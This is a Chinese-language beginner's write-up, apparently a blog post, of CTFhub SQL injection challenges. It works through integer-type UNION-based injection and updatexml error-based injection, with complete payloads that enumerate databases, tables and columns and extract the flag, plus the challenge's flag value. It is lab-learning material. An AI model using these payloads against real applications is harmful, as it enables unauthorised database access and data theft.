SQL注入——整数型注入、报错注入

整数型注入

在CTFhub上的一道整数型注入的题,刚接触SQL注入,这也是我第一次做整数型注入的题,做个记录。
开启环境:
在这里插入图片描述
先判断是否存在注入
payload:

?id=1 and 1=1

在这里插入图片描述
payload:

?id=1 and 1=2

在这里插入图片描述
证明存在注入,那就搞它!
输入1试试,有回显。
在这里插入图片描述
判断字段数 payload:

?id=1 order by 1

在这里插入图片描述
再输入2,3挨个试
payload:

?id=1 order by 3

在这里插入图片描述
发现这里报错了,所以判断字段数只有2
爆数据库:payload:

?id=1 and 1=2 union select 1,database()

在这里插入图片描述
爆出数据库名为sqli
爆表名:


?id=1 and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'

在这里插入图片描述
爆出两个表,一个news一个flag很明显,flag就藏在这里了。
爆字段名:

?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'

在这里插入图片描述
字段名还是flag最后一步爆值:
payload:

?id=1 and 1=2 union select 1,group_concat(flag) from sqli.flag

在这里插入图片描述
flag出来了。get!!!

报错注入

报错注入就是通过反馈出来的错误来获取到我们所需要的信息。
updatexml报错注入
这是我在网上了解到的一种报错注入方式。报错注入原来有好多种办法,这里主要解释这个updatexml报错注入,先介绍updatexml报错的原理:我是一个小白,也不懂什么是updataxml函数,网上查呗看了好几篇博客,也没搞明白updataxml函数,大家写的都一样,反正就是在脚本之家上找到了原版
来自脚本之家
Xpath 语法是要单独去学的,不过没必要,了解一下就行(我是了解都没了解,直接记的。🤣🤣🤣我懒,嫌麻烦。)
然后看到了示例的updataxml函数语句,我疑问更多了。
payload:

id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

呐,我更疑惑了,一看这句,不知道有没有跟我内心活动相同的。(我*,0x7e又是什么????上面还有好多没搞明白的,又来一个。*****直接口吐芬芳)
0x7e我查的是在SQL中的报错什么的,我也不明白,有兴趣的可以百度看看。看的头懵。
updatexml第二个参数需要的是Xpath格式的字符串,但是我们第二个参数如果不是Xpath格式,而是我们想要获得的数据,那么它就会报错,并且在报错的时候会将错的内容显示出来,然后我们就可以获得我们想要的数据了。原理差不多就是这个。
算啦,实在搞不明白不搞了,直接用吧

实战CTFhub的题

开启环境(熟门熟路,不知道开过几次了,看大佬的博客一看就会,一做就废。😥😥😥关键是这玩意而氪金)

在这里插入图片描述
那就输入1试试,查询正确了
在这里插入图片描述
之前没有做过报错的题,这是第一个!!!
该用到updatexml函数了payload:

?id=1 and (updatexml(1,concat(0x7e,(select database()),0x7e),1));

在这里插入图片描述
不出所料得到了我们想要的数据库名sqli
继续payload:

?id=1 and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='sqli'),0x7e),1));

在这里插入图片描述
信息显示sqli下的两个表是newsflag
payload:

id=1 and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag'),0x7e),1));

在这里插入图片描述
payload:

id=1 and (updatexml(1,concat(0x7e,(select group_concat(flag) from flag),0x7e),1));

在这里插入图片描述
查询出来flag了,不过好像不完整。有一个坑????why。
在这里插入图片描述
心态崩了啊。还要再查,查查查………………烦,不过还好找到了,xpath报错只显示32位结果然后要用到另一个函数mid。**需要借助mid函数来进行字符截取从而显示32位以后的数据。**找找mid函数的用法(因为大佬没有解释,只说了怎么用。)还是亲爱的度娘比较贴心。😭😭😭😭
来自百度百科
好嘞,这下就懂了。可以继续了,what??环境到期了,😭😭😭又要花金币。赶紧的,不磨蹭了。
payload:

id=1 and (updatexml(1,concat(0x7e,mid((select group_concat(flag) from flag),32),0x7e),1));

在这里插入图片描述
最后汇总flag:ctfhub{21129dbb7c5caaba20b91e9f8d3018104fe54fcd}
呼……真巴适哈哈哈。在这里插入图片描述
最后再附上大佬博客十种MySQL报错注入
还有这个CTF中的SQL注入

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值